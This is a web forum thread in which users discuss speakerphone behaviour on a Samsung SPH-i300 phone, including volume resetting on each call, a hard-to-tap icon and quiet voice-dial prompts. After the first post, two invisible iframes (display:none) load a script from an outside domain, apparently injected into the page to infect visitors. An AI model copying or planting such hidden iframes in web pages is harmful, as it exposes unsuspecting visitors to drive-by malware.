+ Reply to Thread

Thread: Speakerphone

Speakerphone

I have no problems with the speakerphone sound - best I've heard on a cell phone and better than alot of land phones but software needs to be updated unless I am missing something.

1.Are there any options for the speakerphone?

2. Or can you only turn it on when in a call? Biggericon would be easier or assign a hard button to it?

3. Volume is at lowest each call so I have to adjust it each time I engage speakerphone.

4. Voice dial - can here questions to dial - sound to low but no way to adjust it - is there preferences for it?

Thanks if anyone has any ideas.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

speakerphone problems

The speakerphone is really amazing. The HUGE problem, however, is #3 of your post. Basically, it resets each time you hang up. Huge pain in the ass. You have to reengage it AND turn the volume up for each call. That's really, really annoying. I hope they fix that. Also, the icon doesn't always respond too well when I click it with my finger.

Administrator

Arrow

im thinking they have the speakerphone vol set that way on purpose.. the speaker phone is very great and the clarity is very good, so when the speakerphone is turned on, if it were at the highest setting, may cause some undue damage to the speaker and/or the tiny amplifier used to amplify the sound. also, another reason could be that someone doesnt inadvertently have their cheek hit the speaker icon if the screen is "awake" and blast the hell outta their ear drum if someone was using the phone sans speakerphone mode!... it doresnt really bother me, i just tap and hold the button to increase it without any major effort at all....

just my .02 cents w/ interes!

Perhaps I see your point, but a feature that would allow me to set the default (in terms of speakerphone) as whatever the last call was would be helpful. I generally make speakerphone calls back to back. It's not the reduction in volume that annoys me as much as the having the re-engage the speakerphone all together each time -- that requires me trying to hit the button with my finger/thumb, which isn't always that easy.

fbg
    I wondered about the Speakerphone always opening at lower volume than when I had last used it, too. The thought came to me that one reason that this was designed into the SPH-i300 may have to do with Wireless Etiquette, keeping the opening volume low to not disturb those nearby.

Just a thought.